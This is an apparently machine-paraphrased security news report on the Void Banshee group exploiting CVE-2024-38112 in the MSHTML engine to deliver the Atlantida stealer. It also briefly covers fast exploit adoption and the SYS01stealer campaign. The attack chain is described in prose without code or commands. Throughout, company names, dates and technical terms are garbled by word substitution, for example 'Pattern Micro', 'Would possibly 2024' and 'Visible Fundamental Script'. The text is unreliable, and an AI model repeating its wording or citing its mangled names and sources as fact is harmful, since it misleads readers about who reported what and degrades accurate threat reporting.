A complicated chronic danger (APT) team referred to as Void Banshee has been noticed exploiting a not too long ago disclosed safety flaw within the Microsoft MHTML browser engine as a zero-day to ship a data stealer referred to as Atlantida.
Cybersecurity company Pattern Micro, which noticed the process in mid-Would possibly 2024, the vulnerability – tracked as CVE-2024-38112 – was once used as a part of a multi-stage assault chain the usage of specifically crafted web shortcut (URL) information.
“Diversifications of the Atlantida marketing campaign were extremely energetic all through 2024 and feature developed to make use of CVE-2024-38112 as a part of Void Banshee an infection chains,” safety researchers Peter Girnus and Aliakbar Zahravi mentioned. “The facility of APT teams like Void Banshee to take advantage of disabled products and services corresponding to [Internet Explorer] poses an important danger to organizations international.”
The findings dovetail with prior disclosures from Take a look at Level, which instructed The Hacker Information of a marketing campaign leveraging the similar shortcoming to distribute the stealer. It is price noting that CVE-2024-38112 was once addressed via Microsoft as a part of Patch Tuesday updates remaining week.
CVE-2024-38112 has been described via the Home windows maker as a spoofing vulnerability within the MSHTML (aka Trident) browser engine used within the now-discontinued Web Explorer browser. Alternatively, the 0 Day Initiative (ZDI) has asserted that it is a faraway code execution flaw.
“What occurs when the seller states the repair must be a defense-in-depth replace somewhat than a complete CVE?,” ZDI’s Dustin Childs identified. “What occurs when the seller states the affect is spoofing however the computer virus leads to faraway code execution?”
Assault chains contain the usage of spear-phishing emails embedding hyperlinks to ZIP archive information hosted on file-sharing websites, which comprise URL information that exploit CVE-2024-38112 to redirect the sufferer to a compromised web site website hosting a malicious HTML Utility (HTA).
Opening the HTA dossier leads to the execution of a Visible Fundamental Script (VBS) that, in flip, downloads and runs a PowerShell script answerable for retrieving a .NET trojan loader, which in the end makes use of the Donut shellcode mission to decrypt and execute the Atlantida stealer within RegAsm.exe procedure reminiscence.
Atlantida, modeled on open-source stealers like NecroStealer and PredatorTheStealer, is designed to extract information, screenshots, geolocation, and delicate information from internet browsers and different programs, together with Telegram, Steam, FileZilla, and more than a few cryptocurrency wallets.
“Through the usage of specifically crafted URL information that contained the MHTML protocol handler and the x-usc! directive, Void Banshee was once in a position to get right of entry to and run HTML Utility (HTA) information immediately during the disabled IE procedure,” the researchers mentioned.
“This technique of exploitation is very similar to CVE-2021-40444, every other MSHTML vulnerability that was once utilized in zero-day assaults.”
Now not a lot is understood about Void Banshee rather than the truth that it has a historical past of concentrated on North American, Eu, and Southeast Asian areas for info robbery and fiscal acquire.
The advance comes as Cloudflare published that danger actors are rapidly incorporating proof-of-concept (PoC) exploits into their arsenal, every now and then as briefly as 22 mins after their public free up, as noticed when it comes to CVE-2024-27198.
“The rate of exploitation of disclosed CVEs is continuously sooner than the rate at which people can create WAF regulations or create and deploy patches to mitigate assaults,” the internet infrastructure corporate mentioned.
It additionally follows the invention of a brand new marketing campaign that leverages Fb advertisements selling pretend Home windows topics to distribute every other stealer referred to as SYS01stealer that targets to hijack Fb industry accounts and additional propagate the malware.
“Being an infostealer, SYS01 makes a speciality of exfiltrating browser information corresponding to credentials, historical past, and cookies,” Trustwave mentioned. “A large chew of its payload is considering acquiring get right of entry to tokens for Fb accounts, in particular the ones with Fb industry accounts, which is able to help the danger actors in spreading the malware.”